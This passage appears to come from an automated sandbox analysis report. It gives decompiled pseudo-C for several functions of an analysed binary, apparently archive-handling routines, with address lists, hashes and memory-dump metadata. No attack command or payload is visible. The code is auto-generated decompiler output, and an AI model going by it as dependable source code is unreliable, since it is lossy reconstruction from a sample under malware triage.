					E003B92C9(_t187 - 0x24);
					_t124 =  *(_t187 - 0x10);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t187 - 0xc));
				return _t124;
			}



























                                                                                                    0x003d81fe
                                                                                                    0x003d8208
                                                                                                    0x003d8216
                                                                                                    0x003d8219
                                                                                                    0x003d821c
                                                                                                    0x003d821f
                                                                                                    0x003d8222
                                                                                                    0x003d8225
                                                                                                    0x003d8227
                                                                                                    0x003d822a
                                                                                                    0x003d8230
                                                                                                    0x003d8233
                                                                                                    0x003d8238
                                                                                                    0x003d823c
                                                                                                    0x003d8240
                                                                                                    0x003d8243
                                                                                                    0x003d824f
                                                                                                    0x003d8252
                                                                                                    0x003d8257
                                                                                                    0x003d825a
                                                                                                    0x003d827a
                                                                                                    0x003d827d
                                                                                                    0x003d8282
                                                                                                    0x003d8286
                                                                                                    0x003d828a
                                                                                                    0x003d828d
                                                                                                    0x003d8299
                                                                                                    0x003d82a0
                                                                                                    0x003d82a3
                                                                                                    0x003d82a5
                                                                                                    0x003d82a8
                                                                                                    0x003d82c7
                                                                                                    0x003d82cd
                                                                                                    0x003d82d2
                                                                                                    0x003d82d6
                                                                                                    0x003d82da
                                                                                                    0x003d82dd
                                                                                                    0x003d82e9
                                                                                                    0x003d82f0
                                                                                                    0x003d82f3
                                                                                                    0x003d82f5
                                                                                                    0x003d82f8
                                                                                                    0x003d830a
                                                                                                    0x003d830e
                                                                                                    0x003d8310
                                                                                                    0x003d8315
                                                                                                    0x003d8318
                                                                                                    0x003d831a
                                                                                                    0x003d831a
                                                                                                    0x003d8326
                                                                                                    0x003d8326
                                                                                                    0x003d832e
                                                                                                    0x003d8333
                                                                                                    0x003d8337
                                                                                                    0x003d833b
                                                                                                    0x003d833e
                                                                                                    0x003d834a
                                                                                                    0x003d8351
                                                                                                    0x003d8354
                                                                                                    0x003d8356
                                                                                                    0x003d8359
                                                                                                    0x003d836b
                                                                                                    0x003d836f
                                                                                                    0x003d8371
                                                                                                    0x003d8376
                                                                                                    0x003d8379
                                                                                                    0x003d837b
                                                                                                    0x003d837b
                                                                                                    0x003d8387
                                                                                                    0x003d8387
                                                                                                    0x003d838c
                                                                                                    0x003d8393
                                                                                                    0x003d8398
                                                                                                    0x003d839b
                                                                                                    0x003d83b0
                                                                                                    0x003d83b6
                                                                                                    0x003d83ba
                                                                                                    0x003d83bd
                                                                                                    0x003d83be
                                                                                                    0x003d83c3
                                                                                                    0x003d83c5
                                                                                                    0x003d83d1
                                                                                                    0x003d83d2
                                                                                                    0x003d83d5
                                                                                                    0x003d83d6
                                                                                                    0x003d83db
                                                                                                    0x003d83dd
                                                                                                    0x003d83e7
                                                                                                    0x003d83ea
                                                                                                    0x003d83ed
                                                                                                    0x003d83f3
                                                                                                    0x003d83fd
                                                                                                    0x003d8400
                                                                                                    0x003d8403
                                                                                                    0x003d8406
                                                                                                    0x003d8409
                                                                                                    0x003d840b
                                                                                                    0x003d840e
                                                                                                    0x003d8413
                                                                                                    0x003d8416
                                                                                                    0x003d8419
                                                                                                    0x003d841c
                                                                                                    0x003d841e
                                                                                                    0x003d844f
                                                                                                    0x003d844f
                                                                                                    0x003d8420
                                                                                                    0x003d8420
                                                                                                    0x003d8426
                                                                                                    0x003d8428
                                                                                                    0x003d842e
                                                                                                    0x003d8434
                                                                                                    0x003d8436
                                                                                                    0x003d8439
                                                                                                    0x003d843d
                                                                                                    0x003d8422
                                                                                                    0x003d8422
                                                                                                    0x003d8424
                                                                                                    0x003d8445
                                                                                                    0x003d8447
                                                                                                    0x003d8449
                                                                                                    0x00000000
                                                                                                    0x003d844b
                                                                                                    0x003d844b
                                                                                                    0x003d844d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d844d
                                                                                                    0x003d8449
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d8424
                                                                                                    0x003d8420
                                                                                                    0x003d841e
                                                                                                    0x00000000
                                                                                                    0x003d8409
                                                                                                    0x003d83dd
                                                                                                    0x003d839d
                                                                                                    0x003d839d
                                                                                                    0x003d83a0
                                                                                                    0x003d8453
                                                                                                    0x003d8453
                                                                                                    0x003d8453
                                                                                                    0x003d83a6
                                                                                                    0x003d83a6
                                                                                                    0x003d83aa
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d83aa
                                                                                                    0x003d83a0
                                                                                                    0x003d835b
                                                                                                    0x003d835e
                                                                                                    0x003d8363
                                                                                                    0x003d8363
                                                                                                    0x003d82fa
                                                                                                    0x003d82fd
                                                                                                    0x003d8302
                                                                                                    0x003d8302
                                                                                                    0x003d82aa
                                                                                                    0x003d82ad
                                                                                                    0x003d82b2
                                                                                                    0x003d82b2
                                                                                                    0x003d825c
                                                                                                    0x003d825f
                                                                                                    0x003d8264
                                                                                                    0x003d8264
                                                                                                    0x003d845b
                                                                                                    0x003d8463

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003D81FE
                                                                                                      • Part of subcall function 003B92C9: VariantClear.OLEAUT32(?), ref: 003B92EB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClearH_prologVariant
                                                                                                    • String ID: Unknown error$Unknown warning
                                                                                                    • API String ID: 1166855276-4291957651
                                                                                                    • Opcode ID: d89691ae4a1d3ab371bef1a926a32c74b2365651ddf2f8a02cf873bb7e8554d6
                                                                                                    • Instruction ID: 0d8b8e82f6ee87804abf993ef542bfbe0425a9212bc691b6258880dd6a1adbe5
                                                                                                    • Opcode Fuzzy Hash: d89691ae4a1d3ab371bef1a926a32c74b2365651ddf2f8a02cf873bb7e8554d6
                                                                                                    • Instruction Fuzzy Hash: 46814872900609DFCB11DFA9D481AEEB7F1BF48304F50896EE55AAB751DB70AE08CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003FEFC5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 88%
                                                                                                    			E003FEFC5(intOrPtr* __ecx, void* __eflags) {
				signed int _t82;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t96;
				signed char _t101;
				signed char _t102;
				signed char _t103;
				signed int _t104;
				intOrPtr* _t107;
				intOrPtr* _t111;
				signed char _t117;
				signed int _t129;
				signed int _t132;
				unsigned int _t133;
				void* _t134;
				intOrPtr* _t139;
				intOrPtr* _t140;
				void* _t144;
				void* _t145;

				E0041F1B0(0x427adc, _t145);
				_t139 =  *((intOrPtr*)(_t145 + 0x10));
				 *_t139 = 0;
				 *((intOrPtr*)(_t139 + 4)) = 0;
				 *((intOrPtr*)(_t139 + 8)) = 0;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t111 = __ecx;
				_t140 =  *((intOrPtr*)(_t145 + 0xc)) + 0x28;
				 *((intOrPtr*)(_t145 - 0x18)) = E003B325D(_t140);
				_t82 = E003B3232(_t140, 0x2e);
				_t117 =  *((intOrPtr*)(__ecx + 0x10));
				 *(_t145 - 0xd) =  *(_t145 - 0xd) & 0x00000000;
				_t132 = _t82;
				if(_t117 == 0 ||  *__ecx == 0) {
					 *(_t145 - 0x14) =  *(_t145 - 0x14) & 0x00000000;
					if(_t132 >  *((intOrPtr*)(_t145 - 0x18))) {
						 *(_t145 - 0x14) =  *_t140 + 2 + _t132 * 2;
					}
					_t129 = 0x8000;
					_t133 =  *( *((intOrPtr*)(_t145 + 0xc)) + 0x34);
					if((0x00008000 & _t133) != 0) {
						_t104 = _t133 >> 0x10;
						if((_t104 & 0x00000049) != 0 && (_t104 & 0x0000f000) == 0x8000) {
							_t107 =  *((intOrPtr*)(_t145 + 0xc)) + 0x20;
							if( *((intOrPtr*)(_t107 + 4)) > 0 ||  *_t107 >= 0x800) {
								_t117 = 1;
							}
						}
					}
					if(_t117 != 0) {
						goto L20;
					}
					if( *(_t145 - 0x14) != 0) {
						__eflags =  *((char*)(_t111 + 0xe));
						if( *((char*)(_t111 + 0xe)) == 0) {
							L15:
							_t101 = E003FF560( *(_t145 - 0x14));
							__eflags = _t101;
							if(_t101 == 0) {
								_t129 = 0x42f124;
								_t102 = E003B2407( *(_t145 - 0x14), 0x42f124);
								__eflags = _t102;
								if(_t102 == 0) {
									goto L41;
								}
								_t117 =  *((intOrPtr*)(_t111 + 0xc));
								goto L19;
							}
							_t117 =  *((intOrPtr*)(_t111 + 0xd));
							 *(_t145 - 0xd) = 1;
							goto L19;
						}
						_t103 = E003FF588(_t140);
						__eflags = _t103;
						if(_t103 != 0) {
							goto L20;
						}
						goto L15;
					}
					_t117 =  *((intOrPtr*)(_t111 + 0xf));
					goto L19;
				} else {
					L19:
					if(_t117 == 0) {
						L41:
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *[fs:0x0] =  *((intOrPtr*)(_t145 - 0xc));
						return 0;
					}
					L20:
					_t134 = 0;
					if( *_t111 == 0) {
						__eflags =  *(_t145 - 0xd);
						if( *(_t145 - 0xd) == 0) {
							L40:
							 *(_t145 - 0x24) =  *(_t145 - 0x24) & 0x00000000;
							 *(_t145 - 0x20) =  *(_t145 - 0x20) & 0x00000000;
							 *(_t145 - 0x1c) =  *(_t145 - 0x1c) & 0x00000000;
							goto L41;
						}
						 *(_t145 - 0x24) = 0x3030103;
						_t134 = 1;
						L33:
						if(_t134 == 0) {
							goto L40;
						}
						if( *(_t145 - 0x24) != 3 &&  *(_t145 - 0x20) == 0) {
							E003FF1B9(_t145 - 0x24);
							if( *(_t145 - 0x20) > 1 && (E0041F3F0( *((intOrPtr*)( *((intOrPtr*)(_t145 + 0xc)) + 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t145 + 0xc)) + 0x24)),  *(_t145 - 0x20), 0) | _t129) != 0) {
								_t134 = 0;
							}
						}
						if(_t134 != 0) {
							goto L41;
						} else {
							goto L40;
						}
					}
					if( *((intOrPtr*)(_t111 + 8)) != 0x4000) {
						E003B421F(_t111 + 4, 0x4000);
					}
					 *(_t145 - 0x14) =  *(_t145 - 0x14) & 0x00000000;
					_t90 =  *_t111;
					 *(_t145 - 4) =  *(_t145 - 4) & 0x00000000;
					_t129 = _t145 - 0x14;
					_push(2);
					_push(_t129);
					_push( *(_t145 + 8));
					_push(_t90);
					if( *((intOrPtr*)( *_t90 + 0xc))() == 0) {
						_t122 =  *(_t145 - 0x14);
						if( *(_t145 - 0x14) != 0) {
							_t129 =  *(_t111 + 4);
							 *(_t145 + 8) = 0x4000;
							_t144 = E003BFD71(_t122, _t129, _t145 + 8);
							_t96 =  *(_t145 - 0x14);
							if(_t96 != 0) {
								 *((intOrPtr*)( *_t96 + 8))(_t96);
								 *(_t145 - 0x14) =  *(_t145 - 0x14) & 0x00000000;
							}
							_t168 = _t144;
							if(_t144 == 0) {
								_t129 =  *(_t145 + 8);
								_t134 = E003FF216( *(_t111 + 4), _t129, _t168, _t145 - 0x24);
							}
						}
					}
					_t92 =  *(_t145 - 0x14);
					 *(_t145 - 4) =  *(_t145 - 4) | 0xffffffff;
					if(_t92 != 0) {
						 *((intOrPtr*)( *_t92 + 8))(_t92);
					}
					goto L33;
				}
			}






















                                                                                                    0x003fefca
                                                                                                    0x003fefd4
                                                                                                    0x003fefdd
                                                                                                    0x003fefdf
                                                                                                    0x003fefe2
                                                                                                    0x003fefe8
                                                                                                    0x003fefe9
                                                                                                    0x003fefea
                                                                                                    0x003fefeb
                                                                                                    0x003fefed
                                                                                                    0x003feffb
                                                                                                    0x003feffe
                                                                                                    0x003ff003
                                                                                                    0x003ff006
                                                                                                    0x003ff00c
                                                                                                    0x003ff00e
                                                                                                    0x003ff019
                                                                                                    0x003ff020
                                                                                                    0x003ff028
                                                                                                    0x003ff028
                                                                                                    0x003ff02e
                                                                                                    0x003ff033
                                                                                                    0x003ff038
                                                                                                    0x003ff03d
                                                                                                    0x003ff041
                                                                                                    0x003ff04f
                                                                                                    0x003ff056
                                                                                                    0x003ff060
                                                                                                    0x003ff060
                                                                                                    0x003ff056
                                                                                                    0x003ff041
                                                                                                    0x003ff064
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ff06a
                                                                                                    0x003ff071
                                                                                                    0x003ff075
                                                                                                    0x003ff082
                                                                                                    0x003ff085
                                                                                                    0x003ff08a
                                                                                                    0x003ff08c
                                                                                                    0x003ff09a
                                                                                                    0x003ff09f
                                                                                                    0x003ff0a4
                                                                                                    0x003ff0a6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ff0ac
                                                                                                    0x00000000
                                                                                                    0x003ff0ac
                                                                                                    0x003ff08e
                                                                                                    0x003ff091
                                                                                                    0x00000000
                                                                                                    0x003ff091
                                                                                                    0x003ff079
                                                                                                    0x003ff07e
                                                                                                    0x003ff080
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ff080
                                                                                                    0x003ff06c
                                                                                                    0x00000000
                                                                                                    0x003ff0af
                                                                                                    0x003ff0af
                                                                                                    0x003ff0b1
                                                                                                    0x003ff19d
                                                                                                    0x003ff1a3
                                                                                                    0x003ff1a9
                                                                                                    0x003ff1aa
                                                                                                    0x003ff1ae
                                                                                                    0x003ff1b6
                                                                                                    0x003ff1b6
                                                                                                    0x003ff0b7
                                                                                                    0x003ff0b7
                                                                                                    0x003ff0bb
                                                                                                    0x003ff146
                                                                                                    0x003ff14a
                                                                                                    0x003ff191
                                                                                                    0x003ff191
                                                                                                    0x003ff195
                                                                                                    0x003ff199
                                                                                                    0x00000000
                                                                                                    0x003ff199
                                                                                                    0x003ff14e
                                                                                                    0x003ff155
                                                                                                    0x003ff156
                                                                                                    0x003ff158
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ff15e
                                                                                                    0x003ff169
                                                                                                    0x003ff172
                                                                                                    0x003ff18b
                                                                                                    0x003ff18b
                                                                                                    0x003ff172
                                                                                                    0x003ff18f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ff18f
                                                                                                    0x003ff0cb
                                                                                                    0x003ff0d1
                                                                                                    0x003ff0d1
                                                                                                    0x003ff0d6
                                                                                                    0x003ff0da
                                                                                                    0x003ff0dc
                                                                                                    0x003ff0e0
                                                                                                    0x003ff0e3
                                                                                                    0x003ff0e7
                                                                                                    0x003ff0e8
                                                                                                    0x003ff0eb
                                                                                                    0x003ff0f1
                                                                                                    0x003ff0f3
                                                                                                    0x003ff0f8
                                                                                                    0x003ff0fa
                                                                                                    0x003ff101
                                                                                                    0x003ff109
                                                                                                    0x003ff10b
                                                                                                    0x003ff110
                                                                                                    0x003ff115
                                                                                                    0x003ff118
                                                                                                    0x003ff118
                                                                                                    0x003ff11c
                                                                                                    0x003ff11e
                                                                                                    0x003ff123
                                                                                                    0x003ff131
                                                                                                    0x003ff131
                                                                                                    0x003ff11e
                                                                                                    0x003ff0f8
                                                                                                    0x003ff133
                                                                                                    0x003ff136
                                                                                                    0x003ff13c
                                                                                                    0x003ff141
                                                                                                    0x003ff141
                                                                                                    0x00000000
                                                                                                    0x003ff13c

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog__aullrem
                                                                                                    • String ID: wav
                                                                                                    • API String ID: 3415659256-1803495720
                                                                                                    • Opcode ID: 948bcfda3767477c648d6a979518259ba72558f35ef2dcfb08b6cf68f2e5f78b
                                                                                                    • Instruction ID: 7c77892eceb229aac904c6ced9df6be00c32faf1db2a8747236ccae56d43f39e
                                                                                                    • Opcode Fuzzy Hash: 948bcfda3767477c648d6a979518259ba72558f35ef2dcfb08b6cf68f2e5f78b
                                                                                                    • Instruction Fuzzy Hash: 54616A31A0020E9FDF22CF64C940BBEB7B1AF45355F2580A8DE44AF242DB759E45CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EF675 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 90%
                                                                                                    			E003EF675(void* __ecx) {
				signed int _t63;
				signed int _t64;
				signed int _t73;
				void* _t77;
				void* _t92;
				signed int _t123;
				intOrPtr _t125;
				short* _t126;
				void* _t128;
				signed int _t129;
				void* _t131;

				E0041F1B0(E00426D04, _t131);
				_t128 = __ecx;
				E003B2D8A(_t131 - 0x1c,  *(_t131 + 8));
				_t90 = 0;
				 *((intOrPtr*)(_t131 - 4)) = 0;
				E003B2285( *((intOrPtr*)(_t131 - 0x1c)));
				if( *((intOrPtr*)(_t131 - 0x18)) != 0) {
					__eflags =  *((short*)( *((intOrPtr*)(_t131 - 0x1c)))) - 0x78;
					if( *((short*)( *((intOrPtr*)(_t131 - 0x1c)))) != 0x78) {
						_t63 = E003B2357(_t131 - 0x1c, 0x42e714);
						__eflags = _t63;
						if(_t63 == 0) {
							_t64 = E003B2357(_t131 - 0x1c, "crc");
							__eflags = _t64;
							if(_t64 == 0) {
								_push(_t131 - 0x10);
								_push( *((intOrPtr*)(_t131 + 0xc)));
								_push(_t131 - 0x1c);
								_t67 = E003EF416(__ecx);
								__eflags = _t67;
								if(_t67 == 0) {
									_t123 = E003BCFBA(_t131 - 0x1c, _t131 + 8);
									_t71 = E003B2D8A(_t131 - 0x28,  *((intOrPtr*)(_t131 - 0x1c)) + _t123 * 2);
									__eflags = _t123;
									 *((char*)(_t131 - 4)) = 1;
									if(_t123 != 0) {
										L22:
										__eflags =  *(_t131 + 8) - 0x40;
										if( *(_t131 + 8) > 0x40) {
											goto L19;
										} else {
											_t125 =  *((intOrPtr*)(_t128 + 0x38));
											__eflags = _t125 -  *(_t131 + 8);
											if(__eflags <= 0) {
												_t92 = _t128 + 0x34;
												do {
													L003EF93F(_t92, __eflags);
													_t125 = _t125 + 1;
													__eflags = _t125 -  *(_t131 + 8);
												} while (__eflags <= 0);
											}
											_push( *((intOrPtr*)(_t131 + 0xc)));
											_push(_t131 - 0x28);
											_t129 = L003BDE7C( *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x34)) +  *(_t131 + 8) * 4)));
										}
										goto L27;
									} else {
										_t71 = E003B23AC( *((intOrPtr*)(_t131 - 0x1c)), 0x42e710);
										__eflags = _t71;
										if(_t71 == 0) {
											 *(_t131 + 8) = 0;
											goto L22;
										} else {
											_t126 =  *((intOrPtr*)(_t131 + 0xc));
											_t71 = E003BCF7A(_t126, _t128 + 0x64);
											__eflags = _t71;
											if(_t71 != 0) {
												__eflags =  *_t126 - 8;
												if( *_t126 == 8) {
													_t77 = E003B2D47(_t131 - 0x34);
													_push(_t126);
													_push(_t77);
													 *((char*)(_t131 - 4)) = 2;
													_t129 = L003BDE7C(_t128 + 0x40);
													E003B1E40(E003B1E40(E003B1E40(_t78,  *((intOrPtr*)(_t131 - 0x34))),  *((intOrPtr*)(_t131 - 0x28))),  *((intOrPtr*)(_t131 - 0x1c)));
												} else {
													L19:
													_t129 = 0x80070057;
													goto L27;
												}
											} else {
												_t129 = 0;
												L27:
												_t67 = E003B1E40(_t71,  *((intOrPtr*)(_t131 - 0x28)));
												goto L28;
											}
										}
									}
								} else {
									_t129 =  *(_t131 - 0x10);
									goto L28;
								}
							} else {
								E003B34DC(_t131 - 0x1c, 0, 3);
								_t83 = __ecx + 0x30;
								 *(__ecx + 0x30) = 4;
								goto L4;
							}
							goto L29;
						} else {
							E003B34DC(_t131 - 0x1c, 0, 2);
							 *(_t131 - 0x10) = 9;
							_t86 = E003BCFDB(_t131 - 0x1c,  *((intOrPtr*)(_t131 + 0xc)), _t131 - 0x10);
							__eflags = _t86;
							if(_t86 == 0) {
								_t86 =  *(_t131 - 0x10);
								 *(__ecx + 0x2c) =  *(_t131 - 0x10);
							} else {
								_t90 = _t86;
							}
							E003B1E40(_t86,  *((intOrPtr*)(_t131 - 0x1c)));
							_t73 = _t90;
						}
					} else {
						E003B34A6(_t131 - 0x1c, 0);
						_t83 = __ecx + 0x28;
						 *(__ecx + 0x28) = 9;
						L4:
						_t129 = E003BCFDB(_t131 - 0x1c,  *((intOrPtr*)(_t131 + 0xc)), _t83);
						goto L28;
					}
				} else {
					_t129 = 0x80070057;
					L28:
					E003B1E40(_t67,  *((intOrPtr*)(_t131 - 0x1c)));
					L29:
					_t73 = _t129;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t131 - 0xc));
				return _t73;
			}














                                                                                                    0x003ef67a
                                                                                                    0x003ef685
                                                                                                    0x003ef68d
                                                                                                    0x003ef695
                                                                                                    0x003ef697
                                                                                                    0x003ef69a
                                                                                                    0x003ef6a2
                                                                                                    0x003ef6b1
                                                                                                    0x003ef6b5
                                                                                                    0x003ef6e4
                                                                                                    0x003ef6e9
                                                                                                    0x003ef6eb
                                                                                                    0x003ef734
                                                                                                    0x003ef739
                                                                                                    0x003ef73b
                                                                                                    0x003ef75b
                                                                                                    0x003ef75f
                                                                                                    0x003ef762
                                                                                                    0x003ef763
                                                                                                    0x003ef768
                                                                                                    0x003ef76a
                                                                                                    0x003ef77f
                                                                                                    0x003ef78b
                                                                                                    0x003ef790
                                                                                                    0x003ef792
                                                                                                    0x003ef796
                                                                                                    0x003ef803
                                                                                                    0x003ef803
                                                                                                    0x003ef807
                                                                                                    0x00000000
                                                                                                    0x003ef809
                                                                                                    0x003ef809
                                                                                                    0x003ef80c
                                                                                                    0x003ef80f
                                                                                                    0x003ef811
                                                                                                    0x003ef814
                                                                                                    0x003ef816
                                                                                                    0x003ef81b
                                                                                                    0x003ef81c
                                                                                                    0x003ef81c
                                                                                                    0x003ef814
                                                                                                    0x003ef827
                                                                                                    0x003ef830
                                                                                                    0x003ef836
                                                                                                    0x003ef836
                                                                                                    0x00000000
                                                                                                    0x003ef798
                                                                                                    0x003ef7a0
                                                                                                    0x003ef7a5
                                                                                                    0x003ef7a7
                                                                                                    0x003ef800
                                                                                                    0x00000000
                                                                                                    0x003ef7a9
                                                                                                    0x003ef7a9
                                                                                                    0x003ef7b1
                                                                                                    0x003ef7b6
                                                                                                    0x003ef7b8
                                                                                                    0x003ef7be
                                                                                                    0x003ef7c2
                                                                                                    0x003ef7ce
                                                                                                    0x003ef7d3
                                                                                                    0x003ef7d4
                                                                                                    0x003ef7d8
                                                                                                    0x003ef7e4
                                                                                                    0x003ef7f6
                                                                                                    0x003ef7c4
                                                                                                    0x003ef7c4
                                                                                                    0x003ef7c4
                                                                                                    0x00000000
                                                                                                    0x003ef7c4
                                                                                                    0x003ef7ba
                                                                                                    0x003ef7ba
                                                                                                    0x003ef838
                                                                                                    0x003ef83b
                                                                                                    0x00000000
                                                                                                    0x003ef840
                                                                                                    0x003ef7b8
                                                                                                    0x003ef7a7
                                                                                                    0x003ef76c
                                                                                                    0x003ef76c
                                                                                                    0x00000000
                                                                                                    0x003ef76c
                                                                                                    0x003ef73d
                                                                                                    0x003ef743
                                                                                                    0x003ef748
                                                                                                    0x003ef74b
                                                                                                    0x00000000
                                                                                                    0x003ef74b
                                                                                                    0x00000000
                                                                                                    0x003ef6ed
                                                                                                    0x003ef6f3
                                                                                                    0x003ef702
                                                                                                    0x003ef709
                                                                                                    0x003ef70e
                                                                                                    0x003ef710
                                                                                                    0x003ef716
                                                                                                    0x003ef719
                                                                                                    0x003ef712
                                                                                                    0x003ef712
                                                                                                    0x003ef712
                                                                                                    0x003ef71f
                                                                                                    0x003ef725
                                                                                                    0x003ef725
                                                                                                    0x003ef6b7
                                                                                                    0x003ef6bb
                                                                                                    0x003ef6c0
                                                                                                    0x003ef6c3
                                                                                                    0x003ef6c9
                                                                                                    0x003ef6d5
                                                                                                    0x00000000
                                                                                                    0x003ef6d5
                                                                                                    0x003ef6a4
                                                                                                    0x003ef6a4
                                                                                                    0x003ef841
                                                                                                    0x003ef844
                                                                                                    0x003ef84a
                                                                                                    0x003ef84a
                                                                                                    0x003ef84a
                                                                                                    0x003ef852
                                                                                                    0x003ef85a

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: @$crc
                                                                                                    • API String ID: 3519838083-849529298
                                                                                                    • Opcode ID: c1e196684b052fe3919007ed14cb676d833ba9a4eaf5b72423a5fe2199fa55e5
                                                                                                    • Instruction ID: 5902d1e273e40df08d63bd6aedf46291b144309076f1ebee57ab239ff52eaa51
                                                                                                    • Opcode Fuzzy Hash: c1e196684b052fe3919007ed14cb676d833ba9a4eaf5b72423a5fe2199fa55e5
                                                                                                    • Instruction Fuzzy Hash: D251D13190025ADFCF13EF91D8919EEB775EF44344F118239E9126B691DBB4AE0ACB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C21CB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 88%
                                                                                                    			E003C21CB(void* __ecx, intOrPtr* __edx) {
				void* __edi;
				signed int _t73;
				void* _t87;
				void* _t90;
				void* _t95;
				void* _t101;
				signed int _t116;
				signed int _t128;
				signed int _t136;
				intOrPtr _t140;
				signed char* _t143;
				intOrPtr* _t155;
				void* _t162;
				void* _t164;
				void* _t165;

				E0041F1B0(0x42373e, _t162);
				_t165 = _t164 - 0xc0;
				 *(_t162 - 0x10) =  *(_t162 - 0x10) & 0x00000000;
				_t155 = __edx;
				_t143 = __ecx;
				 *((intOrPtr*)(_t162 - 0x14)) = __edx;
				 *(_t162 - 0x18) = __ecx;
				if( *((intOrPtr*)(__edx + 4)) <= 0) {
					L19:
					_t73 =  *(_t162 - 0x10);
					_t171 = _t73 -  *((intOrPtr*)(_t155 + 4));
					if(_t73 !=  *((intOrPtr*)(_t155 + 4))) {
						_push( *((intOrPtr*)( *((intOrPtr*)( *_t155 + _t73 * 4)))));
						_push("incorrect update switch command");
						E003D097C(_t162 - 0x30, _t171);
						_t73 = _t162 - 0x30;
						_push(0x431428);
						_push(_t73);
						L0041F1D0();
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t162 - 0xc));
					return _t73;
				} else {
					goto L1;
				}
				do {
					L1:
					_t140 =  *0x429ca8; // 0x429630
					_t109 =  *((intOrPtr*)( *_t155 +  *(_t162 - 0x10) * 4));
					if(E003B23AC( *((intOrPtr*)( *((intOrPtr*)( *_t155 +  *(_t162 - 0x10) * 4)))), _t140) == 0) {
						_t116 = 7;
						memcpy(_t162 - 0x4c,  *(_t162 + 8), _t116 << 2);
						_t165 = _t165 + 0xc;
						E003B2D47(_t162 - 0x24);
						 *(_t162 - 4) = 0;
						__eflags = E003C23BE(_t109, _t162 - 0x4c, _t162 - 0x24);
						if(__eflags == 0) {
							 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
							_push( *((intOrPtr*)(_t162 - 0x24)));
							L16:
							E003B1E40(_t81);
							L18:
							_t155 =  *((intOrPtr*)(_t162 - 0x14));
							goto L19;
						}
						__eflags =  *(_t162 - 0x20);
						if( *(_t162 - 0x20) != 0) {
							_t81 =  *((intOrPtr*)(_t162 - 0x24));
							__eflags =  *_t81 - 0x21;
							if( *_t81 != 0x21) {
								_t55 = _t162 - 4;
								 *_t55 =  *(_t162 - 4) | 0xffffffff;
								__eflags =  *_t55;
								_push(_t81);
								goto L16;
							}
							E003B2D47(_t162 - 0xcc);
							 *(_t162 - 4) = 1;
